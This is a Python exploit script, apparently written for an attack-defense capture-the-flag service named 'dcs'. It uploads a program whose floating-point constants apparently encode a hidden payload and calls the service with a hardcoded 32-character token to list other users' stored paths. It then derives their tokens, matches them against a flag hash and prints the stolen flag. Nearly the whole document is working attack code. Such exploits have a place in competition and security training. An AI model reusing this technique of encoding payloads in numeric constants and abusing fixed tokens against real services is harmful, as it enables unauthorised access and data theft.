sploits/dcs/dcs.1.sploit.py

#!/usr/bin/env python3

import hashlib
import sys

import api

code = '''
_0000 = 4.45822432662471531958872096101e+252;
_0001 = 1.19782304862903820345902151854e+243;
_0002 = 1.91433085964668933099730042059e+261;
_0003 = 3.98455339352822777031486764751e+252;
_0004 = 9.73522563016263357401293305748e-315;
_0005 = 3.88936149933469592127393174833e+174;
_0006 = 3.88936149933469592127393174833e+174;
_0007 = 4.45822432662471531958872096101e+252;
_0008 = 5.93621147035131015845707833809e+169;
_0009 = 5.52559648449915692702815701664e+257;
_000a = 6.32280097505374462953932699201e+233;
_000b = 8.25971437587339054081582628633e-154;
_000c = 9.31476625662437923964372193661e+242;
_000d = 5.93621147035131015845707833809e+169;
_000e = 6.53747834600816911773243398146e-125;
_000f = 6.53747834600816911773243398146e-125;
_0010 = 3.9381538893456823461224877281e-62;
_0011 = 3.11888404251331059194979670708e+161;
_0012 = 5.52559648449915692702815701664e+257;
_0013 = 3.4653160729132520229722030536e+185;
_0014 = 1.29503525642399536129001394637e+171;
_0015 = 1.9143324972053054017456038103e+261;
_0016 = 5.52559648449915692702815701664e+257;
_0017 = 1.33980497747332409769287086757e-152;
_0018 = 3.88936149933469592127393174833e+174;
_0019 = 4.39558737237486546973012633094e+252;
_001a = 1.91429491296407703192166757816e+261;
_001b = -6.82761769577296130672065869357e-229;
_001c = 1.19782304862903820345902151854e+243;
_001d = 1.35452787268204745946619571028e+243;
_001e = -3605727437012366848;
_001f = -11920.0000000052332325140014291;
_0020 = -1.13962551584212620632980908507e-244;
_0021 = 1.41894014867253636496431508459e+161;
_0022 = 3.08856759534166243916303683284e-308;
_0023 = 6.17713519068332487832607366568e-308;
_0024 = 1.08805855771401084070533089734e-306;
_0025 = 9.5729280743176072948036481258e-308;

fun main() {
    if (_001a < _0025) {
        return _0023;
    }
}
'''

PORT = 7654
HOSTNAME = sys.argv[1]
FLAG_ID = sys.argv[2]


def sha256(s: str) -> str:
    return hashlib.sha256(s.encode('utf-8')).hexdigest()


if __name__ == '__main__':
    with api.DCSClient(HOSTNAME, PORT) as c:
        r = c.create(code, 'PWNED')
        assert(r.error == '')

        r = c.get()
        assert(r.error == '')

        r = c.get('ructfructfructfructfructfructfru')
        assert(r.error == '')

        paths = r.description
        def get_token_from_path(p):
            l = p.split('/')
            if len(l) < 2:
                return ''
            return l[-2] + l[-1]
        victim_tokens = list(map(get_token_from_path, paths.split('\n')))

        for t in victim_tokens:
            if sha256(t) == FLAG_ID:
                r = c.get(t)
                assert(r.error == '')
                print(r.description)